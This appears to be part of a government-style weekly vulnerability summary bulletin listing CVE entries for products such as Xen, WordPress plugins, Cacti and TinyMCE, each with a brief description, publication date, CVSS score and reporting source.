pycryptodome/pycryptodomex — pycryptodome/pycryptodomex PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, exploitable for a Manger attack. 2024-01-05 not yet calculated CVE-2023-52323
cve@mitre.org
rengine — rengine reNgine through 2.0.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. 2024-01-01 not yet calculated CVE-2023-50094
cve@mitre.org
royal_tsx — royal_tsx Royal RoyalTSX before 6.0.2.1 allows attackers to cause a denial of service (Heap Memory Corruption and application crash) or possibly have unspecified other impact via a long hostname in an RTSZ file, if the victim clicks on Test Connection. This occurs during SecureGatewayHost object processing in RAPortCheck.createNWConnection. 2023-12-31 not yet calculated CVE-2023-52277
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain an arbitrary file read vulnerability. 2024-01-04 not yet calculated CVE-2023-29962
cve@mitre.org
scone — scone A lack of pointer-validation logic in the __scone_dispatch component of SCONE before v5.8.0 for Intel SGX allows attackers to access sensitive information. 2023-12-30 not yet calculated CVE-2022-46486
cve@mitre.org
scone — scone An issue was discovered in SCONE Confidential Computing Platform before 5.8.0 for Intel SGX. Lack of pointer-alignment logic in __scone_dispatch and other entry functions allows a local attacker to access unauthorized information, aka an “AEPIC Leak.” 2023-12-30 not yet calculated CVE-2023-38023
cve@mitre.org
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to obtain sensitive information and bypass profile restriction via improper access control in the Reader system user’s web browser, allowing the journal to be displayed, despite the option being disabled. 2023-12-29 not yet calculated CVE-2023-31293
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the Delivery Name field. 2023-12-29 not yet calculated CVE-2023-31294
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the User Profile field. 2023-12-29 not yet calculated CVE-2023-31295
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Barcode field of a container. 2023-12-29 not yet calculated CVE-2023-31299
cve@mitre.org
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via transmission of unencrypted, cleartext credentials during Password Reset feature. 2023-12-29 not yet calculated CVE-2023-31300
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Teller field. 2023-12-29 not yet calculated CVE-2023-31302
cve@mitre.org
spip — spip ecrire/public/assembler.php in SPIP before 4.1.3 and 4.2.x before 4.2.7 allows XSS because input from _request() is not restricted to safe characters such as alphanumerics. 2024-01-04 not yet calculated CVE-2023-52322
cve@mitre.org
springblade — springblade An issue in SpringBlade v.3.7.0 and before allows a remote attacker to escalate privileges via the lack of permissions control framework. 2024-01-02 not yet calculated CVE-2023-47458
cve@mitre.org
stmicroelectronics_n.v. — stsafe-a1xx STMicroelectronics STSAFE-A1xx middleware before 3.3.7 allows MCU code execution if an adversary has the ability to read from and write to the I2C bus. This is caused by an StSafeA_ReceiveBytes buffer overflow in the X-CUBE-SAFEA1 Software Package for STSAFE-A sample applications (1.2.0), and thus can affect user-written code that was derived from a published sample application. 2024-01-01 not yet calculated CVE-2023-50096
cve@mitre.org
sympa — sympa Sympa before 6.2.62 relies on a cookie parameter for certain security objectives but does not ensure that this parameter exists and has an unpredictable value. Specifically, the cookie parameter is both a salt for stored passwords and an XSS protection mechanism. 2023-12-31 not yet calculated CVE-2021-46900
cve@mitre.org
tecno_mobile — tecno_camon_x_ca7 Gallery3d on Tecno Camon X CA7 devices allows attackers to view hidden images by navigating to data/com.android.gallery3d/.privatealbum/.encryptfiles and guessing the correct image file extension. 2023-12-31 not yet calculated CVE-2023-52275
cve@mitre.org
tenda — ax3 Tenda AX3 v16.03.12.11 was discovered to contain a remote code execution (RCE) vulnerability via the list parameter at /goform/SetNetControlList. 2024-01-04 not yet calculated CVE-2023-51812
cve@mitre.org
tenda — i29 Buffer Overflow vulnerability in Tenda i29 versions 1.0 V1.0.0.5 and 1.0 V1.0.0.2, allows remote attackers to cause a denial of service (DoS) via the pingIp parameter in the pingSet function. 2024-01-05 not yet calculated CVE-2023-50991
cve@mitre.org
the_genie_company — aladdin_connect Users’ product account authentication data was stored in clear text in The Genie Company Aladdin Connect Mobile Application Version 5.65 Build 2075 (and below) on Android Devices. This allows the attacker, with access to the android device, to potentially retrieve users’ clear text authentication credentials. 2024-01-03 not yet calculated CVE-2023-5879
cve@rapid7.con
the_genie_company — aladdin_connect When the Genie Company Aladdin Connect garage door opener (Retrofit-Kit Model ALDCM) is placed into configuration mode the web servers “Garage Door Control Module Setup” page is vulnerable to XSS via a broadcast SSID name containing malicious code with client side Java Script and/or HTML. This allows the attacker to inject malicious code with client side Java Script and/or HTML into the users’ web browser.  2024-01-03 not yet calculated CVE-2023-5880
cve@rapid7.con
the_genie_company — aladdin_connect Unauthenticated access permitted to web interface page The Genie Company Aladdin Connect (Retrofit-Kit Model ALDCM) “Garage Door Control Module Setup” and modify the Garage door’s SSID settings. 2024-01-03 not yet calculated CVE-2023-5881
cve@rapid7.con
tinymce — tinymce TinyMCE versions before 5.9.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user’s browser. 2024-01-03 not yet calculated CVE-2024-21908
disclosure@vulncheck.com
tinymce — tinymce TinyMCE versions before 5.10.0 are affected by a cross-site scripting vulnerability. A remote and unauthenticated attacker could introduce crafted image or link URLs that would result in the execution of arbitrary JavaScript in an editing user’s browser. 2024-01-03 not yet calculated CVE-2024-21910
disclosure@vulncheck.com
tinymce — tinymce TinyMCE versions before 5.6.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user’s browser. 2024-01-03 not yet calculated CVE-2024-21911
disclosure@vulncheck.com
tms — tms Cross Site Scripting (XSS) vulnerability in xiweicheng TMS v.2.28.0 allows a remote attacker to execute arbitrary code via a crafted script to the click here function. 2024-01-04 not yet calculated CVE-2023-50630
cve@mitre.org
ureport2 — ureport2 Arbitrary File Write vulnerability in the saveReportFile method of ureport2 2.2.9 and before allows attackers to write arbitrary files and run arbitrary commands via crafted POST request. 2024-01-03 not yet calculated CVE-2023-50090
cve@mitre.org
wasm-micro-runtime — wasm-micro-runtime Bytecode Alliance wasm-micro-runtime (aka WebAssembly Micro Runtime or WAMR) before 1.3.0 can have a “double free or corruption” error for a valid WebAssembly module because push_pop_frame_ref_offset is mishandled. 2023-12-31 not yet calculated CVE-2023-52284
cve@mitre.org
wordpress — wordpress The affiliate-toolkit WordPress plugin before 3.4.3 lacks authorization and authentication for requests to its affiliate-toolkit-starter/tools/atkp_imagereceiver.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URL’s, including RFC1918 private addresses, leading to a Server Side Request Forgery (SSRF) issue. 2024-01-01 not yet calculated CVE-2023-5877
contact@wpscan.com
wordpress — wordpress The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. 2024-01-01 not yet calculated CVE-2023-6000
contact@wpscan.com
wordpress — wordpress The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2024-01-01 not yet calculated CVE-2023-6037
contact@wpscan.com
wordpress — wordpress The PayHere Payment Gateway WordPress plugin before 2.2.12 automatically creates publicly accessible log files containing sensitive information when transactions occur. 2024-01-01 not yet calculated CVE-2023-6064
contact@wpscan.com
wordpress — wordpress The WP STAGING WordPress Backup Plugin before 3.1.3 and WP STAGING Pro WordPress Backup Plugin before 5.1.3 do not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later. 2024-01-01 not yet calculated CVE-2023-6113
contact@wpscan.com
wordpress — wordpress The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly accessible files, which may allow attackers monitoring those to leak sensitive information from the site’s backups. 2024-01-01 not yet calculated CVE-2023-6271
contact@wpscan.com
wordpress — wordpress The Download Manager WordPress plugin before 3.2.83 does not protect file download’s passwords, leaking it upon receiving an invalid one. 2024-01-01 not yet calculated CVE-2023-6421
contact@wpscan.com
wordpress — wordpress The Html5 Video Player WordPress plugin before 2.5.19 does not sanitize and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins. 2024-01-01 not yet calculated CVE-2023-6485
contact@wpscan.com
wordpress — wordpress The POST SMTP WordPress plugin before 2.8.7 does not sanitize and escape the msg parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. 2024-01-03 not yet calculated CVE-2023-6621
contact@wpscan.com
xen — xen Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetic in the helpers can overflow and would then result to skip the cache cleaning/invalidation. Therefore, there is no guarantee when all the writes will reach the memory. 2024-01-05 not yet calculated CVE-2023-34321
security@xen.org
xen — xen For migration as well as to work around kernels unaware of L1TF (see XSA-273), PV guests may be run in shadow paging mode. Since Xen itself needs to be mapped when PV guests run, Xen and shadowed PV guests run directly the respective shadow page tables. For 64-bit PV guests this means running on the shadow of the guest root page table. In the course of dealing with shortage of memory in the shadow pool associated with a domain, shadows of page tables may be torn down. This tearing down may include the shadow root page table that the CPU in question is presently running on. While a precaution exists to supposedly prevent the tearing down of the underlying live page table, the time window covered by that precaution isn’t large enough. 2024-01-05 not yet calculated CVE-2023-34322
security@xen.org
xen — xen When a transaction is committed, C Xenstored will first check the quota is correct before attempting to commit any nodes. It would be possible that accounting is temporarily negative if a node has been removed outside of the transaction. Unfortunately, some versions of C Xenstored are assuming that the quota cannot be negative and are using assert() to confirm it. This will lead to C Xenstored crash when tools are built without -DNDEBUG (this is the default). 2024-01-05 not yet calculated CVE-2023-34323
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] libfsimage contains parsing code for several filesystems, most of them based on grub-legacy code. libfsimage is used by pygrub to inspect guest disks. Pygrub runs as the same user as the toolstack (root in a privileged domain). At least one issue has been reported to the Xen Security Team that allows an attacker to trigger a stack buffer overflow in libfsimage. After further analysis the Xen Security Team is no longer confident in the suitability of libfsimage when run against guest controlled input with super user privileges. In order to not affect current deployments that rely on pygrub patches are provided in the resolution section of the advisory that allow running pygrub in deprivileged mode. CVE-2023-4949 refers to the original issue in the upstream grub project (“An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation.”) CVE-2023-34325 refers specifically to the vulnerabilities in Xen’s copy of libfsimage, which is descended from a very old version of grub. 2024-01-05 not yet calculated CVE-2023-34325
security@xen.org
xen — xen The caching invalidation guidelines from the AMD-Vi specification (48882-Rev 3.07-PUB-Oct 2022) are incorrect on some hardware, as devices will malfunction (see stale DMA mappings) if some fields of the DTE are updated but the IOMMU TLB is not flushed. Such stale DMA mappings can point to memory ranges not owned by the guest, thus allowing access to unintended memory regions. 2024-01-05 not yet calculated CVE-2023-34326
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately, there are errors in Xen’s handling of the guest state, leading to denials of service. 1) CVE-2023-34327 – An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 – A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely. 2024-01-05 not yet calculated CVE-2023-34327
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately, there are errors in Xen’s handling of the guest state, leading to denials of service. 1) CVE-2023-34327 – An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 – A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely. 2024-01-05 not yet calculated CVE-2023-34328
security@xen.org
xen — xen The current setup of the quarantine page tables assumes that the quarantine domain (dom_io) has been initialized with an address width of DEFAULT_DOMAIN_ADDRESS_WIDTH (48) and hence 4-page table levels. However, dom_io being a PV domain gets the AMD-Vi IOMMU page tables levels based on the maximum (hot pluggable) RAM address, and hence on systems with no RAM above the 512GB mark only 3 page-table levels are configured in the IOMMU. On systems without RAM above the 512GB boundary amd_iommu_quarantine_init() will setup page tables for the scratch page with 4 levels, while the IOMMU will be configured to use 3 levels only, resulting in the last page table directory (PDE) effectively becoming a page table entry (PTE), and hence a device in quarantine mode gaining write access to the page destined to be a PDE. Due to this page table level mismatch, the sink page the device gets read/write access to is no longer cleared between device assignment, possibly leading to data leaks. 2024-01-05 not yet calculated CVE-2023-46835
security@xen.org
xen — xen The fixes for XSA-422 (Branch Type Confusion) and XSA-434 (Speculative Return Stack Overflow) are not IRQ-safe. It was believed that the mitigations always operated in contexts with IRQs disabled. However, the original XSA-254 fix for Meltdown (XPTI) deliberately left interrupts enabled on two entry paths; one unconditionally, and one conditionally on whether XPTI was active. As BTC/SRSO and Meltdown affect different CPU vendors, the mitigations are not active together by default. Therefore, there is a race condition whereby a malicious PV guest can bypass BTC/SRSO protections and launch a BTC/SRSO attack against Xen. 2024-01-05 not yet calculated CVE-2023-46836
security@xen.org
xen — xen Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetic in the helpers can overflow and would then result to skip the cache cleaning/invalidation. Therefore, there is no guarantee when all the writes will reach the memory. This undefined behavior was meant to be addressed by XSA-437, but the approach was not sufficient. 2024-01-05 not yet calculated CVE-2023-46837
security@xen.org
yasm — yasm Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49554
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49555
cve@mitre.org
yasm — yasm Buffer Overflow vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component. 2024-01-03 not yet calculated CVE-2023-49556
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component. 2024-01-03 not yet calculated CVE-2023-49557
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49558
cve@mitre.org


Vulnerability Summary for the Week of December 25, 2023

 High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
awslabs — sandbox-accounts-for-events “Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. 2023-12-22 7.1 CVE-2023-50928
security-advisories@github.com
awslabs — sandbox-accounts-for-events Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. 2023-12-22 7.8 CVE-2023-51386
security-advisories@github.com
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the function zfp_prec_decompress at zfp/blosc2-zfp.c. 2023-12-25 7.5 CVE-2023-37185
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference in ndlz/ndlz8x8.c via a NULL pointer to memset. 2023-12-25 7.5 CVE-2023-37186
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the zfp/blosc2-zfp.c zfp_acc_decompress function. 2023-12-25 7.5 CVE-2023-37187
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the function zfp_rate_decompress at zfp/blosc2-zfp.c. 2023-12-25 7.5 CVE-2023-37188
cve@mitre.org
cacti — cacti Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. 2023-12-22 8.8 CVE-2023-49085
security-advisories@github.com
cacti — cacti Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `managers.php`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `/cacti/managers.php` with an SQLi payload in the `selected_graphs_array` HTTP GET parameter. As of time of publication, no patched versions exist. 2023-12-22 8.8 CVE-2023-51448
security-advisories@github.com
campcodes — online_college_library_system A vulnerability has been found in Campcodes Online College Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php of the component Search. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249178 is the identifier assigned to this vulnerability. 2023-12-29 7.3 CVE-2023-7156
cna@vuldb.com
clickhouse — clickhouse ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. 2023-12-22 7 CVE-2023-48704
security-advisories@github.com
cloudflare — miniflare Sending specially crafted HTTP requests to Miniflare’s server could result in arbitrary HTTP and WebSocket requests being sent from the server. If Miniflare was configured to listen on external network interfaces (as was the default in wrangler until 3.19.0), an attacker on the local network could access other local servers. 2023-12-29 7.5 CVE-2023-7078
cna@cloudflare.com
cloudflare — wrangler The V8 inspector intentionally allows arbitrary code execution within the Workers sandbox for debugging. wrangler dev would previously start an inspector server listening on all network interfaces. This would allow an attacker on the local network to connect to the inspector and run arbitrary code. Additionally, the inspector server did not validate Origin/Host headers, granting an attacker that can trick any user on the local network into opening a malicious website the ability to run code. If wrangler dev --remote was being used, an attacker could access production resources if they were bound to the worker. This issue was fixed in wrangler@3.19.0 and wrangler@2.20.2. Whilst wrangler dev’s inspector server listens on local interfaces by default as of wrangler@3.16.0, an SSRF vulnerability in miniflare https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-fwvg-2739-22v7 (CVE-2023-7078) allowed access from the local network until wrangler@3.18.0. wrangler@3.19.0 and wrangler@2.20.2 introduced validation for the Origin/Host headers. 2023-12-29 8.5 CVE-2023-7080
cna@cloudflare.com
code-projects — faculty_management_system A vulnerability was found in code-projects Faculty Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/php/crud.php. The manipulation of the argument fieldname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248948. 2023-12-25 9.8 CVE-2023-7096
cna@vuldb.com
code-projects — library_management_system A vulnerability, which was classified as critical, was found in code-projects Library Management System 2.0. Affected is an unknown function of the file index.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249006 is the identifier assigned to this vulnerability. 2023-12-26 9.8 CVE-2023-7111
cna@vuldb.com
code-projects — water_billing_system A vulnerability classified as critical has been found in code-projects Water Billing System 1.0. This affects an unknown part of the file /addbill.php. The manipulation of the argument owners_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248949 was assigned to this vulnerability. 2023-12-25 9.8 CVE-2023-7097
cna@vuldb.com
coolkit_technology — ewelink_-_smart_home Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass. This issue affects eWeLink before 5.2.0. 2023-12-30 7.7 CVE-2023-6998
cvd@cert.pl
d-link — d-view_8 A security issue exists in D-Link D-View 8 v2.0.2.89 and prior that could allow an attacker to manipulate the probe inventory of the D-View service. This could result in the disclosure of information from other probes, denial of service conditions due to the probe inventory becoming full, or the execution of tasks on other probes. 2023-12-28 10 CVE-2023-7163
vulnreport@tenable.com
deepin_linux — deepin_linux Deepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. 2023-12-22 9.3 CVE-2023-50254
security-advisories@github.com
deepin_linux — deepin_linux Deepin-Compressor is the default archive manager of Deepin Linux OS. Prior to 5.12.21, there’s a path traversal vulnerability in deepin-compressor that can be exploited to achieve Remote Command Execution on the target system upon opening crafted archives. Users are advised to update to version 5.12.21 which addresses the issue. There are no known workarounds for this vulnerability. 2023-12-27 9.3 CVE-2023-50255
security-advisories@github.com
dell — client_bios Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. 2023-12-22 7.2 CVE-2023-43088
security_alert@emc.com
dell — supportassist_client_consumer Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. 2023-12-22 7.3 CVE-2023-48670
security_alert@emc.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. 2023-12-22 7.5 CVE-2022-39337
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. 2023-12-22 7.2 CVE-2023-51387
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. 2023-12-22 7.5 CVE-2023-51650
security-advisories@github.com
engelsystem — engelsystem Engelsystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user’s context. This vulnerability enables an authenticated user to inject Javascript into other user’s sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. 2023-12-22 7.3 CVE-2023-50924
security-advisories@github.com
gm_information_technologies — mdo Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GM Information Technologies MDO allows SQL Injection. This issue affects MDO: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4675
iletisim@usom.gov.tr
grackle — grackle Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioural characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. 2023-12-22 7.5 CVE-2023-50730
security-advisories@github.com
honor — com.hihonor.phoneservice Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7 CVE-2023-51431
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.3 CVE-2023-23436
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by buffer overflow vulnerability, successful exploitation could cause code execution. 2023-12-29 9.3 CVE-2023-51434
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51435
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.3 CVE-2023-23431
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.3 CVE-2023-23432
3836d913-7555-4dd0-a509-f5667fdf5fe4
ibm — aspera_console IBM Aspera Console 3.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210322. 2023-12-25 7.2 CVE-2021-38927
psirt@us.ibm.com
ibm — financial_transaction_manager_for_swift_services In the Message Entry and Repair (MER) facility of IBM Financial Transaction Manager for SWIFT Services 3.2.4 the sending address and the message type of FIN messages are assumed to be immutable. However, an attacker might modify these elements of a business transaction. IBM X-Force ID: 273183. 2023-12-25 7.5 CVE-2023-49880
psirt@us.ibm.com
ibm — i Facsimile Support for IBM i 7.2, 7.3, 7.4, and 7.5 could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause arbitrary code to run with the privilege of the user invoking the facsimile support. IBM X-Force ID: 267689. 2023-12-25 7 CVE-2023-43064
psirt@us.ibm.com
ibm — planning_analytics IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. 2023-12-22 9.8 CVE-2023-42017
psirt@us.ibm.com
iteachyou — dreamer_cms A vulnerability was found in Dreamer CMS 4.1.3. It has been declared as problematic. This vulnerability affects unknown code of the file /upload/uploadFile. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248938 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-24 8.8 CVE-2023-7091
cna@vuldb.com
kashipara — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49688
help@fluidattacks.com
kashipara — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49689
help@fluidattacks.com
libaom — libaom Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc(). 2023-12-27 9 CVE-2023-6879
cve-coordination@google.com
